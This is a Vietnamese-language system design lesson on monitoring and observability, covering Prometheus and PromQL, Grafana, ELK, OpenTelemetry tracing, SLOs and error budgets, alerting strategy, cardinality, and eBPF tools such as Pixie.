Tuần 13: Monitoring & Observability

“Một hệ thống production không có monitoring giống như lái máy bay trong đêm mà không có bảng điều khiển — bạn không biết mình đang bay ổn hay đang lao thẳng xuống đất.”

Tags: system-design monitoring observability prometheus grafana elk opentelemetry devops security Student: Hieu Prerequisite: Tuan-11-Microservices-Pattern · Tuan-12-CICD-Pipeline Liên quan: Tuan-02-Back-of-the-envelope · Tuan-05-Load-Balancer · Tuan-09-Rate-Limiter · Tuan-14-AuthN-AuthZ-Security · Tuan-15-Data-Security-Encryption


1. Context & Why

Analogy: Bảng điều khiển buồng lái máy bay (Cockpit Dashboard)

Hieu, tưởng tượng em là phi công đang lái một chiếc Boeing 777 chở 400 hành khách xuyên Thái Bình Dương. Trong buồng lái có hàng trăm đồng hồ và màn hình:

  • Altimeter (cao độ) → tương đương latency — hệ thống đang phản hồi nhanh hay chậm?
  • Airspeed indicator (tốc độ) → tương đương throughput/traffic — bao nhiêu request đang đi qua?
  • Fuel gauge (nhiên liệu) → tương đương saturation — CPU/memory/disk còn bao nhiêu?
  • Engine warning lights (đèn cảnh báo động cơ) → tương đương error rate — có gì đang hỏng không?
  • Black box recorder (hộp đen) → tương đương logs & traces — khi sự cố xảy ra, em tìm nguyên nhân từ đâu?
  • ATC communication (liên lạc kiểm soát không lưu) → tương đương alerting — ai thông báo cho em khi có vấn đề?

Không phi công nào bay mù (fly blind). Nếu tất cả đồng hồ tắt, quy trình bắt buộc là hạ cánh khẩn cấp. Tương tự, nếu hệ thống production không có monitoring, em đang “bay mù” — không biết khi nào sập, không biết tại sao sập, không biết sập ở đâu.

Tại sao Monitoring & Observability quan trọng?

Không có MonitoringCó Monitoring & Observability
Khách hàng báo lỗi → mới biết hệ thống sậpAlert lúc 3AM → on-call engineer fix trước khi user biết
”Hệ thống chậm” — không biết chậm ở đâuP99 latency tăng từ 50ms → 500ms tại service Payment
Debug bằng cách đọc code và đoánDistributed trace cho thấy bottleneck ở DB query #47
Capacity planning = “cảm giác”Metrics cho thấy CPU sẽ chạm 90% trong 14 ngày
Postmortem = “chắc do deploy mới”Log + trace + metrics = root cause analysis chính xác

Monitoring vs Observability — Khác nhau thế nào?

MonitoringObservability
Câu hỏi”Hệ thống có đang hoạt động không?""Tại sao hệ thống hoạt động như vậy?”
ApproachKnown unknowns — biết trước cần theo dõi gìUnknown unknowns — khám phá vấn đề chưa lường trước
OutputDashboard, alertsKhả năng drill-down, correlate, explore
AnalogyĐèn check engine trên xeKỹ sư cắm máy chẩn đoán OBD-II vào xe
Ví dụCPU > 90% → alert”Tại sao latency tăng 3x chỉ cho user ở VN vào lúc 9PM?”

Monitoring là subset của Observability. Monitoring nói cho em biết cái gì hỏng. Observability giúp em hiểu tại sao nó hỏng — ngay cả khi em chưa từng gặp lỗi đó trước đây.


2. Deep Dive — Các khái niệm cốt lõi

2.1 Ba trụ cột của Observability (Three Pillars)

┌─────────────────────────────────────────────────┐
│              OBSERVABILITY                        │
│                                                   │
│   ┌──────────┐  ┌──────────┐  ┌──────────────┐  │
│   │ METRICS  │  │  LOGS    │  │   TRACES     │  │
│   │          │  │          │  │              │  │
│   │ "What"   │  │ "Why"    │  │ "Where"      │  │
│   │ is       │  │ did it   │  │ did it       │  │
│   │ happening│  │ happen   │  │ happen       │  │
│   └──────────┘  └──────────┘  └──────────────┘  │
│                                                   │
│   Prometheus     ELK Stack    OpenTelemetry       │
│   Grafana        Fluentd      Jaeger / Zipkin     │
│   Datadog        Loki                             │
└─────────────────────────────────────────────────┘

Pillar 1: Metrics (Số liệu đo lường)

Metrics là dữ liệu dạng số (numeric), biểu diễn trạng thái của hệ thống tại một thời điểm, được thu thập theo interval cố định.

Metric TypeMô tảVí dụ
CounterGiá trị chỉ tăng, reset khi restarthttp_requests_total, errors_total
GaugeGiá trị tăng hoặc giảmcpu_usage_percent, memory_used_bytes, active_connections
HistogramPhân phối giá trị vào các buckethttp_request_duration_seconds (p50, p90, p99)
SummaryTương tự histogram nhưng tính quantile phía clientgo_gc_duration_seconds

Khi nào dùng Histogram vs Summary?

  • Histogram: Khi cần aggregate across instances (phổ biến hơn, dùng với Prometheus)
  • Summary: Khi cần quantile chính xác trên single instance, không cần aggregate

Đặc điểm quan trọng của Metrics:

  • Cheap to store: Mỗi data point chỉ ~16 bytes (timestamp + value)
  • Fast to query: Time-series database tối ưu cho range queries
  • Good for alerting: Dễ đặt threshold
  • Nhược điểm: Không có context chi tiết (chỉ biết “error rate tăng”, không biết “error gì, ở đâu, cho user nào”)

Pillar 2: Logs (Nhật ký)

Logs là các event record rời rạc (discrete events), chứa thông tin chi tiết về điều gì đã xảy ra.

Ba dạng log phổ biến:

DạngVí dụƯu điểmNhược điểm
Plaintext2024-01-15 10:30:45 ERROR Payment failed for user 123Dễ đọc cho ngườiKhó parse, khó search
Structured (JSON){"timestamp":"2024-01-15T10:30:45Z","level":"ERROR","service":"payment","user_id":"123","error":"insufficient_funds"}Machine-parseable, filterableVerbose hơn
BinaryProtobuf-encoded logCompact, fastCần tool đặc biệt để đọc

Best Practice: Luôn dùng Structured Logging (JSON). Lý do: khi hệ thống có 100 services, mỗi service 10K logs/second, em không thể grep plaintext. Em cần jq, Elasticsearch, hay Loki để filter service=payment AND level=ERROR AND user_id=123.

Structured Logging Fields chuẩn:

{
  "timestamp": "2024-01-15T10:30:45.123Z",
  "level": "ERROR",
  "service": "payment-service",
  "instance": "payment-7b4f9d8c-x2k9p",
  "trace_id": "abc123def456",
  "span_id": "span789",
  "user_id": "usr_12345",
  "method": "POST",
  "path": "/api/v1/payments",
  "status_code": 500,
  "duration_ms": 2345,
  "error": "database_connection_timeout",
  "message": "Failed to process payment: connection pool exhausted"
}

Pillar 3: Traces (Distributed Tracing)

Traces theo dõi một request khi nó đi qua nhiều services trong hệ thống phân tán (distributed system).

User Request (trace_id: abc-123)
│
├── [Span 1] API Gateway          ─── 2ms
│   ├── [Span 2] Auth Service     ─── 5ms
│   ├── [Span 3] Payment Service  ─── 150ms  ← Bottleneck!
│   │   ├── [Span 4] DB Query     ─── 120ms  ← Root cause!
│   │   └── [Span 5] Redis Cache  ─── 1ms
│   └── [Span 6] Notification Svc ─── 10ms
│
Total: 168ms

Các khái niệm quan trọng:

TermGiải thích
TraceToàn bộ hành trình của 1 request qua hệ thống (gồm nhiều spans)
SpanMột operation đơn lẻ trong trace (ví dụ: 1 DB query, 1 HTTP call)
Trace IDID duy nhất identify toàn bộ trace, được propagate qua tất cả services
Span IDID duy nhất cho mỗi span
Parent Span IDSpan cha, tạo thành tree structure
Context PropagationCơ chế truyền trace_id/span_id giữa các services (thường qua HTTP headers)

Context Propagation Headers:

traceparent: 00-abc123def456-span789-01
tracestate: vendor=value

W3C Trace Context là chuẩn (standard) được OpenTelemetry sử dụng. Trước đó mỗi vendor có format riêng (Zipkin dùng X-B3-TraceId, Jaeger dùng uber-trace-id).

2.2 Prometheus Architecture — Hệ thống Metrics tiêu chuẩn

Prometheus là monitoring system open-source, được Cloud Native Computing Foundation (CNCF) graduated (cùng level với Kubernetes).

Kiến trúc tổng quan

┌──────────────────────────────────────────────────────────────┐
│                    PROMETHEUS ECOSYSTEM                        │
│                                                                │
│  ┌─────────────┐     PULL (scrape)     ┌──────────────────┐  │
│  │ Target Apps │ ◄──────────────────── │   Prometheus     │  │
│  │ /metrics    │      every 15s        │   Server         │  │
│  │             │                        │                  │  │
│  │ - app:8080  │                        │ ┌──────────────┐│  │
│  │ - node:9100 │                        │ │  Retrieval   ││  │
│  │ - mysql:9104│                        │ │  (Scraper)   ││  │
│  └─────────────┘                        │ └──────┬───────┘│  │
│                                          │        │        │  │
│  ┌─────────────┐                        │ ┌──────▼───────┐│  │
│  │ Service     │  service discovery     │ │    TSDB      ││  │
│  │ Discovery   │───────────────────────►│ │ (Time Series ││  │
│  │             │                        │ │  Database)   ││  │
│  │ - k8s API   │                        │ └──────┬───────┘│  │
│  │ - consul    │                        │        │        │  │
│  │ - DNS       │                        │ ┌──────▼───────┐│  │
│  │ - file_sd   │                        │ │   PromQL     ││  │
│  └─────────────┘                        │ │ (Query Lang) ││  │
│                                          │ └──────┬───────┘│  │
│                                          └────────┼────────┘  │
│                                                   │           │
│           ┌───────────────────┬───────────────────┤           │
│           │                   │                   │           │
│    ┌──────▼──────┐    ┌──────▼──────┐    ┌───────▼───────┐  │
│    │  Grafana    │    │ Alertmanager│    │ API Consumers │  │
│    │ (Dashboard) │    │             │    │               │  │
│    │             │    │ - Routing   │    │ - Custom UI   │  │
│    │ - Charts    │    │ - Grouping  │    │ - Scripts     │  │
│    │ - Alerts    │    │ - Silencing │    │ - CI/CD       │  │
│    │ - Tables    │    │ - Inhibit   │    └───────────────┘  │
│    └─────────────┘    │             │                        │
│                        │ ┌─────────┐│                        │
│                        │ │PagerDuty││                        │
│                        │ │Slack    ││                        │
│                        │ │Email    ││                        │
│                        │ └─────────┘│                        │
│                        └─────────────┘                        │
└──────────────────────────────────────────────────────────────┘

Pull-based Model (Tại sao Prometheus “kéo” thay vì “nhận”?)

Pull (Prometheus)Push (Datadog, InfluxDB)
Cơ chếPrometheus chủ động gọi tới /metrics endpointApp chủ động gửi metrics tới collector
Ưu điểmDễ biết target còn sống (nếu scrape fail → target down); Không cần config phía appApp không cần biết collector ở đâu; Tốt cho short-lived jobs
Nhược điểmCần service discovery; Khó cho short-lived jobsKhó phát hiện target chết; DDoS risk nếu nhiều app push cùng lúc
Giải phápDùng Pushgateway cho batch/cron jobsRate limiting phía collector

TSDB — Time Series Database

Prometheus lưu dữ liệu trong TSDB tự phát triển, tối ưu cho time-series data:

Cấu trúc data:

metric_name{label1="value1", label2="value2"} value timestamp

# Ví dụ:
http_requests_total{method="GET", path="/api/users", status="200"} 15234 1705312245
http_requests_total{method="POST", path="/api/orders", status="500"} 42 1705312245
node_cpu_seconds_total{cpu="0", mode="idle"} 98234.56 1705312245

TSDB Internal Structure:

data/
├── 01BKGV7JBM69T2G1BGBGM6KB12/   # Block (2h default)
│   ├── chunks/                      # Compressed time-series data
│   │   └── 000001
│   ├── tombstones                   # Deleted data markers
│   ├── index                        # Inverted index (label → series)
│   └── meta.json                    # Block metadata
├── 01BKGTZQ1SYQJTR4PB43C8PD98/   # Another block
├── 01BKGTZQ1HHWHV8FBJXW1Y3W0K/
├── chunks_head/                     # Current (in-memory) block
│   └── 000001
└── wal/                             # Write-Ahead Log
    ├── 000000002
    └── 000000003
  • Block: Mỗi block chứa data của 2 giờ (default), immutable sau khi compact
  • Compaction: Blocks cũ được merge để giảm I/O khi query
  • WAL (Write-Ahead Log): Đảm bảo data không mất khi crash trước khi persist vào block
  • Retention: Default 15 ngày, configurable

PromQL — Prometheus Query Language

PromQL là ngôn ngữ query mạnh mẽ cho time-series data. Đây là kỹ năng bắt buộc cho mọi DevOps/SRE engineer.

Các query quan trọng nhất:

# === INSTANT VECTOR (giá trị tại 1 thời điểm) ===
 
# Tổng request hiện tại
http_requests_total
 
# Filter bằng label
http_requests_total{method="GET", status=~"2.."}
 
# === RANGE VECTOR (giá trị trong khoảng thời gian) ===
 
# Request trong 5 phút gần nhất
http_requests_total[5m]
 
# === FUNCTIONS ===
 
# Rate: số request/giây trung bình trong 5 phút (quan trọng nhất!)
rate(http_requests_total[5m])
 
# QPS theo method
sum by (method) (rate(http_requests_total[5m]))
 
# Error rate (%)
sum(rate(http_requests_total{status=~"5.."}[5m]))
/
sum(rate(http_requests_total[5m]))
* 100
 
# P99 latency (từ histogram)
histogram_quantile(0.99,
  sum by (le) (rate(http_request_duration_seconds_bucket[5m]))
)
 
# P50 (median) latency per service
histogram_quantile(0.50,
  sum by (le, service) (rate(http_request_duration_seconds_bucket[5m]))
)
 
# CPU usage (%)
100 - (avg by (instance) (rate(node_cpu_seconds_total{mode="idle"}[5m])) * 100)
 
# Memory usage (%)
(1 - node_memory_MemAvailable_bytes / node_memory_MemTotal_bytes) * 100
 
# Disk sẽ đầy trong bao lâu (predictive)
predict_linear(node_filesystem_avail_bytes[7d], 30*24*3600)
 
# Top 5 endpoints theo QPS
topk(5, sum by (path) (rate(http_requests_total[5m])))
 
# Increase (tổng tăng trong khoảng thời gian — dùng cho counter)
increase(http_requests_total{status="500"}[1h])

2.3 Grafana Dashboards

Grafana là nền tảng visualization tiêu chuẩn, hỗ trợ nhiều datasource (Prometheus, Elasticsearch, Loki, InfluxDB, CloudWatch…).

Dashboard tổ chức theo layers:

LayerDashboardMục đích
BusinessRevenue, Active Users, Conversion RateStakeholder, Product Manager
ApplicationQPS, Latency, Error Rate, SaturationDevelopers, SRE
InfrastructureCPU, Memory, Disk, NetworkSRE, DevOps
DatabaseQuery latency, Connection pool, Replication lagDBA, Backend
NetworkPacket loss, Bandwidth, DNS resolutionNetwork Engineer

2.4 ELK Stack — Centralized Logging

ELK = Elasticsearch + Logstash + Kibana (bây giờ thường gọi là Elastic Stack vì có thêm Beats).

┌──────────┐    ┌──────────┐    ┌───────────────┐    ┌──────────┐
│  Apps    │    │  Beats   │    │   Logstash    │    │ Elastic  │
│          │───►│(Filebeat)│───►│               │───►│ search   │
│ stdout/  │    │          │    │ - Parse       │    │          │
│ file log │    │ Lightwt  │    │ - Transform   │    │ Index &  │
│          │    │ shipper  │    │ - Enrich      │    │ Search   │
└──────────┘    └──────────┘    │ - Filter PII  │    └────┬─────┘
                                └───────────────┘         │
                                                    ┌─────▼─────┐
                                                    │  Kibana   │
                                                    │           │
                                                    │ - Search  │
                                                    │ - Visualize│
                                                    │ - Dashboard│
                                                    │ - Alerting │
                                                    └───────────┘

Mỗi component đóng vai trò gì?

ComponentVai tròAnalogy
Beats (Filebeat)Lightweight agent, đọc log files và forwardBưu tá thu thư ở mỗi nhà
LogstashData processing pipeline: parse, transform, enrich, filterBưu điện phân loại thư
ElasticsearchDistributed search & analytics engine, lưu trữ + index logsThư viện khổng lồ có catalog
KibanaWeb UI để search, visualize, tạo dashboardThủ thư giúp tìm sách

Alternative nhẹ hơn: PLG Stack (Promtail + Loki + Grafana) — Grafana Loki thiết kế giống Prometheus nhưng cho logs, index chỉ labels (không full-text index như Elasticsearch), rẻ hơn nhiều về storage.

2.5 Distributed Tracing — OpenTelemetry, Jaeger, Zipkin

OpenTelemetry (OTel)

OpenTelemetry là chuẩn mở (open standard) cho observability, merge từ OpenTracing + OpenCensus. Đây là CNCF project, vendor-neutral.

Tại sao OTel quan trọng?

  • Vendor lock-in elimination: Instrument 1 lần, export tới bất kỳ backend (Jaeger, Zipkin, Datadog, New Relic, Grafana Tempo…)
  • Unified API: Một SDK cho cả Metrics + Logs + Traces
  • Auto-instrumentation: Libraries cho hầu hết framework (Express, Flask, Spring Boot…)
  • Industry standard: AWS, Google, Microsoft, Datadog đều support
┌─────────────────────────────────────────────────────────┐
│               OPENTELEMETRY ARCHITECTURE                 │
│                                                           │
│  ┌──────────┐  ┌──────────┐  ┌──────────┐               │
│  │ Service A│  │ Service B│  │ Service C│               │
│  │ (OTel    │  │ (OTel    │  │ (OTel    │               │
│  │  SDK)    │  │  SDK)    │  │  SDK)    │               │
│  └────┬─────┘  └────┬─────┘  └────┬─────┘               │
│       │              │              │                     │
│       └──────────────┼──────────────┘                     │
│                      │                                    │
│              ┌───────▼────────┐                           │
│              │  OTel Collector│                           │
│              │                │                           │
│              │ ┌────────────┐ │                           │
│              │ │ Receivers  │ │  OTLP, Jaeger, Zipkin    │
│              │ └─────┬──────┘ │                           │
│              │ ┌─────▼──────┐ │                           │
│              │ │ Processors │ │  Batch, Filter, Sample   │
│              │ └─────┬──────┘ │                           │
│              │ ┌─────▼──────┐ │                           │
│              │ │ Exporters  │ │  Jaeger, Zipkin, OTLP    │
│              │ └─────┬──────┘ │                           │
│              └───────┼────────┘                           │
│                      │                                    │
│         ┌────────────┼────────────┐                       │
│         │            │            │                       │
│    ┌────▼───┐  ┌─────▼────┐  ┌───▼──────┐               │
│    │ Jaeger │  │ Grafana  │  │ Datadog  │               │
│    │        │  │ Tempo    │  │ / others │               │
│    └────────┘  └──────────┘  └──────────┘               │
└─────────────────────────────────────────────────────────┘

Jaeger vs Zipkin

JaegerZipkin
Tác giảUber (CNCF graduated)Twitter (open-source)
Ngôn ngữGoJava
StorageCassandra, Elasticsearch, Kafka, BadgerCassandra, Elasticsearch, MySQL
UIRicher, dependency graphSimpler, lightweight
SamplingAdaptive sampling (head + tail)Fixed-rate sampling
Khi nào dùngProduction lớn, cần adaptive samplingSetup nhanh, hệ thống nhỏ-trung

2.6 SLO / SLA / SLI — Ngôn ngữ chung của Reliability

Ba khái niệm này là nền tảng của Site Reliability Engineering (SRE), được Google popularize.

TermViết tắt củaGiải thíchVí dụ
SLIService Level IndicatorMetric đo lường quality of serviceTỷ lệ request thành công: 99.95%
SLOService Level ObjectiveMục tiêu nội bộ cho SLI”99.9% request phải trả về trong < 200ms”
SLAService Level AgreementHợp đồng với khách hàng, có hậu quả nếu vi phạm”Nếu uptime < 99.95%, khách được hoàn 10% phí”

Quan hệ: SLI (đo) → SLO (mục tiêu nội bộ, chặt hơn SLA) → SLA (cam kết với khách hàng)

Ví dụ cụ thể cho một API service:

SLISLOSLA
Availability (% request success)99.95% trong 30 ngày99.9% — vi phạm thì credit 10%
Latency P99< 200ms< 500ms — vi phạm thì credit 5%
Error rate< 0.05%< 0.1% — vi phạm thì credit 5%

Error Budget — Ngân sách lỗi

Error Budget = lượng “lỗi cho phép” dựa trên SLO. Đây là khái niệm cực kỳ quan trọng vì nó biến reliability thành con số đo được.

Ví dụ: SLO = 99.9% availability trong 30 ngày

Error Budget Policy (chính sách khi ngân sách cạn):

Error Budget remainingAction
> 50%Normal development, deploy freely
25% – 50%Tăng review, limit risky deploys
5% – 25%Feature freeze, focus stability
0% (exhausted)Code freeze — chỉ được fix bugs và improve reliability

Aha Moment: Error budget tạo cân bằng giữa velocity (ship features nhanh) và reliability (hệ thống ổn định). Không còn tranh cãi “Dev muốn deploy, Ops muốn stable” — error budget là con số khách quan.

2.7 Golden Signals — 4 tín hiệu vàng (Google SRE Book)

Google đề xuất 4 metrics quan trọng nhất cần monitor cho mọi service:

SignalGiải thíchPromQL Example
LatencyThời gian xử lý request (phân biệt success vs error latency)histogram_quantile(0.99, sum by(le)(rate(http_request_duration_seconds_bucket[5m])))
TrafficLượng demand (request/s, transactions/s)sum(rate(http_requests_total[5m]))
ErrorsTỷ lệ request thất bại (explicit 5xx, implicit: wrong result)sum(rate(http_requests_total{status=~"5.."}[5m])) / sum(rate(http_requests_total[5m]))
SaturationMức độ “đầy” của resource (CPU, memory, disk, connections)(1 - node_memory_MemAvailable_bytes / node_memory_MemTotal_bytes)

Tại sao 4 signals này đủ? Vì chúng cover 4 câu hỏi: “Có chậm không?” (Latency), “Có nhiều không?” (Traffic), “Có lỗi không?” (Errors), “Có quá tải không?” (Saturation).

2.8 RED Method vs USE Method

Hai framework bổ sung cho Golden Signals, apply cho các loại component khác nhau:

RED Method (cho Services/Microservices — Tom Wilkie, Grafana Labs)

MetricGiải thíchÁp dụng
RateRequests per secondMọi service
ErrorsFailed requests per secondMọi service
DurationDistribution of request latencyMọi service

RED = Golden Signals trừ Saturation. Tập trung vào user experience.

USE Method (cho Resources/Infrastructure — Brendan Gregg, Netflix)

MetricGiải thíchÁp dụng
Utilization% thời gian resource bậnCPU, Disk, Network
SaturationLượng work bị queued/pendingQueue depth, swap usage
ErrorsError eventsHardware errors, network drops

USE áp dụng cho từng hardware resource: CPU, Memory, Disk I/O, Network I/O.

Khi nào dùng gì?

Đối tượngDùngVí dụ
API endpointRED/api/v1/payments — Rate, Errors, Duration
Kubernetes podUSECPU utilization, memory saturation, OOM errors
DatabaseCả haiRED cho queries; USE cho disk I/O, connections
Message queueUSEQueue depth (saturation), consumer lag, message errors

2.9 Alerting Strategy — Chiến lược cảnh báo

Severity Levels

LevelKhi nàoResponse TimeAi nhậnKênh
P1 / CriticalService down, data loss, security breach< 5 phútOn-call engineer + managerPagerDuty (phone call), SMS
P2 / HighDegraded performance, partial outage< 30 phútOn-call engineerPagerDuty, Slack incidents
P3 / WarningApproaching threshold, non-critical error spike< 4 giờ (business hours)Team leadSlack alerts
P4 / InfoAnomaly detected, capacity planningNext business dayTeam via weekly reviewEmail, dashboard

Escalation Policy

Time 0    → On-call Primary receives alert
            ↓ (no ack in 5 min)
Time +5m  → On-call Secondary receives alert
            ↓ (no ack in 10 min)
Time +15m → Engineering Manager receives alert
            ↓ (no ack in 15 min)
Time +30m → VP Engineering / CTO receives alert
            ↓ (auto-conference bridge opened)
Time +45m → Incident Commander declared, war room

Alerting Best Practices

DoDon’t
Alert on symptoms (user-facing: latency, errors)Alert on causes (CPU high — might be fine during batch job)
Set alerts based on SLO burn rateSet arbitrary thresholds without SLO context
Use multi-window alerting (5min AND 1hr)Alert on single data point (noisy)
Include runbook link in alertSend alert with no context or action
Page only for user-impacting issuesPage for every warning (alert fatigue)
Review and tune alerts monthlySet and forget

SLO-based Alerting (Google’s Burn Rate)

Thay vì alert “error rate > 1%”, dùng burn rate — tốc độ tiêu thụ error budget:

Ví dụ: SLO = 99.9%, observed error rate = 0.5%

→ Đang tiêu error budget nhanh gấp 5 lần cho phép. Nếu tiếp tục, error budget sẽ cạn trong = 6 ngày thay vì 30 ngày.

Multi-window alerting rules:

SeverityBurn RateShort WindowLong WindowAlert After
P114.4x5 phút1 giờTức thì — budget cạn trong 2 ngày
P26x30 phút6 giờBudget cạn trong 5 ngày
P31x6 giờ3 ngàyBudget đang tiêu đúng tốc độ cạn cuối tháng

2.10 Cardinality Explosion Problem — Bẫy chết người

Cardinality = số lượng unique time series (unique combinations of metric name + label values).

Ví dụ an toàn:

http_requests_total{method="GET", status="200"}   # method: ~5 values, status: ~10 values
# Cardinality = 5 × 10 = 50 series → OK

Ví dụ NGUY HIỂM:

http_requests_total{method="GET", user_id="usr_12345", request_id="req_abc"}
# user_id: 10M values, request_id: infinite
# Cardinality = 5 × 10M × ∞ = EXPLOSION 💥

Tại sao cardinality explosion nguy hiểm?

Hệ quảChi tiết
Memory OOMPrometheus giữ tất cả active series trong RAM
Query timeoutPromQL query trên 10M series → CPU 100%
Disk explosionMỗi series ~16 bytes/sample × 4 samples/min × 10M series = 640M/min = 922GB/day
Billing shockNếu dùng managed service (Datadog, Grafana Cloud) → mỗi custom metric = $$$

Quy tắc vàng: KHÔNG BAO GIỜ dùng high-cardinality values làm label:

  • User ID
  • Request ID / Trace ID
  • IP address
  • Email
  • URL path (nếu có path params: /users/123 → vô hạn)

Thay vào đó: Dùng labels với bounded cardinality (method, status_code, service_name, region, pod_name). Nếu cần user-level data → dùng Logs hoặc Traces, không phải Metrics.

2.11 Modern Observability — High-Cardinality Structured Events

Cập nhật 2024-2026: Honeycomb-style “high-cardinality structured events” đang dần thay thế tách bạch Metrics + Logs + Traces cũ. Đây là quan điểm hiện đại được Charity Majors (CTO Honeycomb) và Liz Fong-Jones formalize trong sách “Observability Engineering” (O’Reilly 2022).

2.11.1 Vấn đề của 3-Pillars truyền thống

Section 2.1 trên mô tả 3 trụ cột Metrics + Logs + Traces. Nhưng trong production hiện đại, có 3 vấn đề lớn:

Vấn đềChi tiết
Pre-aggregation kills detailMetrics chỉ có aggregate (P99 = 200ms) — không biết WHO bị 200ms
Cardinality limitsMetrics không kham được user_id, request_id labels
3 silos không correlate dễMetric tăng → tìm log → tìm trace = 3 tools, 3 query languages
”Known unknowns” onlyPhải biết trước cần monitor gì → “unknown unknowns” không thấy

2.11.2 Giải pháp: High-Cardinality Structured Events

Quan điểm cốt lõi: Mỗi request emit 1 wide event với hàng trăm fields:

{
  "timestamp": "2026-05-01T10:30:45.123Z",
  "service": "checkout-api",
  "instance": "checkout-7b4f9d8c-x2k9p",
  "region": "us-east-1",
  "trace_id": "abc123",
  "span_id": "span789",
 
  "user_id": "usr_12345",
  "user_tier": "premium",
  "user_country": "VN",
  "session_id": "sess_xyz",
 
  "request_method": "POST",
  "request_path": "/api/v1/checkout",
  "request_size_bytes": 2048,
 
  "response_status": 200,
  "response_size_bytes": 512,
  "duration_ms": 234,
 
  "db_query_count": 5,
  "db_total_time_ms": 145,
  "cache_hit": true,
  "cache_lookup_count": 3,
 
  "feature_flag_a": true,
  "feature_flag_b": false,
  "experiment_arm": "control",
 
  "build_id": "v2.45.1",
  "deploy_id": "deploy-abc",
 
  "downstream_service": "payment-api",
  "downstream_duration_ms": 89,
  "downstream_retry_count": 1,
 
  "error": null,
  "error_message": null,
  "warnings": ["slow_query"]
}

Mỗi field là một dimension để slice/dice.

Tại sao tốt hơn:

  • Có thể query: “P99 latency cho premium users tại VN với feature flag A bật, ở build v2.45.1, sau deploy gần đây”
  • “Unknown unknowns” → drill-down dynamic, không cần predefine dashboard
  • Single tool, single query language

2.11.3 So sánh: Metrics vs Structured Events

Metrics (Prometheus)Structured Events (Honeycomb-style)
Storage cost/event~16 bytes (TSDB optimized)~1-5KB (full event)
CardinalityThấp (~10K series/host)Vô tận (mỗi event độc lập)
AggregationPre-aggregated (P99 over 1m bucket)On-the-fly (compute từ events)
Drill-downLimited (chỉ labels có sẵn)Unlimited (mọi field)
CostCheapĐắt hơn (mỗi event lưu full)
Best forHigh-volume, low-cardinality (CPU, network)High-cardinality, business logic insight

Lưu ý: Không phải thay thế hoàn toàn — complementary. Metrics vẫn cho infrastructure. Events cho application/business.

2.11.4 OpenTelemetry Span Events — Best of both

OpenTelemetry traces + span attributes có thể act như structured events. Mỗi span có thể attach unlimited attributes:

from opentelemetry import trace
 
tracer = trace.get_tracer(__name__)
 
@app.post("/checkout")
def checkout(user_id, items):
    with tracer.start_as_current_span("checkout") as span:
        # Set rich attributes (high-cardinality OK in traces)
        span.set_attribute("user.id", user_id)
        span.set_attribute("user.tier", get_user_tier(user_id))
        span.set_attribute("user.country", get_user_country(user_id))
        span.set_attribute("checkout.item_count", len(items))
        span.set_attribute("checkout.total_amount", calculate_total(items))
        span.set_attribute("feature.new_pricing", flag_enabled("new_pricing"))
        span.set_attribute("deploy.version", os.getenv("APP_VERSION"))
 
        # ... business logic
        return result

Sample rate: Trace data đắt hơn metrics → sample. Default: 1-10% sampling rate. Tail-based sampling: keep 100% errors + slow requests + 1% normal.

2.11.5 Vendors & tools

ToolApproachBest for
HoneycombNative high-card eventsPioneer, best UX
Datadog APMMetrics + Traces + Logs in 1 platformEnterprise, full-stack
New RelicSameEstablished
Grafana Tempo + LokiOSS traces + logsSelf-hosted, cost-conscious
Lightstep / ServiceNowMicroservice deep diveMicroservice-heavy
OpenTelemetry + ClickHouseDIYMaximum flexibility

Tham chiếu:

2.12 eBPF Observability — Kernel-level Visibility

Cập nhật 2024-2026: eBPF-based observability (Pixie, Cilium Hubble, Parca) cung cấp visibility ở mức kernel mà không cần instrument application code.

2.12.1 Vấn đề của instrumentation truyền thống

Application-level instrumentation (OpenTelemetry SDK, Datadog agent):

  • Phải modify code (add SDK, decorators, middleware)
  • Language-specific: Python SDK ≠ Go SDK ≠ Rust SDK
  • Performance overhead: 1-10% CPU, depends on sampling
  • Doesn’t see kernel/network internals: TCP retransmits, syscall delays, scheduler latency

2.12.2 eBPF — Observability Without Code Changes

eBPF programs chạy trong kernel, observe mọi syscall, network packet, function call. Không cần modify application.

┌──────────────────────────────┐
│ Application (no SDK needed)   │
│ user-space syscall            │
└─────────────┬────────────────┘
              │
              ▼
┌──────────────────────────────┐
│  Linux Kernel                 │
│  ┌────────────────────────┐  │
│  │  eBPF probes attached  │  │
│  │  - kprobes (kernel fn) │  │
│  │  - uprobes (user fn)   │  │
│  │  - tracepoints         │  │
│  │  - XDP (network)       │  │
│  └─────────┬──────────────┘  │
└────────────┼─────────────────┘
             │ ring buffer
             ▼
┌──────────────────────────────┐
│  User-space collector         │
│  → Send to backend            │
└──────────────────────────────┘

Ưu điểm:

Lợi íchChi tiết
Zero code changesDeploy DaemonSet, instant visibility cho mọi pod
Language-agnosticWorks cho Python, Go, Rust, Java, C++, anything
Kernel + network visibilityTCP retransmits, syscall latency, page faults — invisible từ app
Low overhead< 1% CPU typical
Production-safeVerifier ensure no infinite loops, no kernel panic

Nhược điểm:

Hạn chếChi tiết
Linux-onlyKhông chạy trên Windows/Mac (servers OK)
Kernel version requirementeBPF features cần kernel 4.18+ (CO-RE: 5.5+)
PrivilegedCần CAP_BPF hoặc privileged container
Symbol resolutionStripped binary → kernel không biết function name

2.12.3 eBPF Tools

ToolUse caseURL
Pixie (CNCF)Auto-instrument Kubernetes appshttps://px.dev/
Cilium HubbleNetwork observabilityhttps://docs.cilium.io/en/stable/gettingstarted/hubble/
ParcaContinuous profilinghttps://www.parca.dev/
PyroscopeProfilinghttps://pyroscope.io/
bcc toolsCLI tools (e.g., tcpconnect, biolatency)https://github.com/iovisor/bcc
bpftraceDTrace-like for eBPFhttps://github.com/iovisor/bpftrace

2.12.4 Ví dụ thực tế: Pixie auto-tracing

# Install Pixie on K8s cluster
px deploy
 
# Run pre-built scripts (no code change needed)
px run px/http_data
# → Sees ALL HTTP requests in cluster, including method, path, latency, status
 
px run px/mysql_data
# → Sees ALL MySQL queries with timings
 
px run px/dns
# → Sees DNS resolution latency

Magic: Không có instrumentation code nào. Pixie attach eBPF probes vào kernel → intercept syscalls → reconstruct application protocols (HTTP, gRPC, MySQL, Redis…).

2.12.5 Continuous Profiling với Parca/Pyroscope

Profiling truyền thống chỉ chạy on-demand (perf, pprof). Continuous profiling capture profile mọi thời điểm với negligible overhead.

Always-on profile → flame graph → identify CPU hotspots, memory leaks, lock contention
                                  ở mức code line, no extra instrumentation

Use case:

  • Tìm CPU hotspot ở production (1% function chiếm 30% CPU)
  • Phát hiện memory leak (function X đang giữ bộ nhớ tăng dần)
  • Debug performance regression sau deploy (compare profile pre/post)

Tham chiếu:

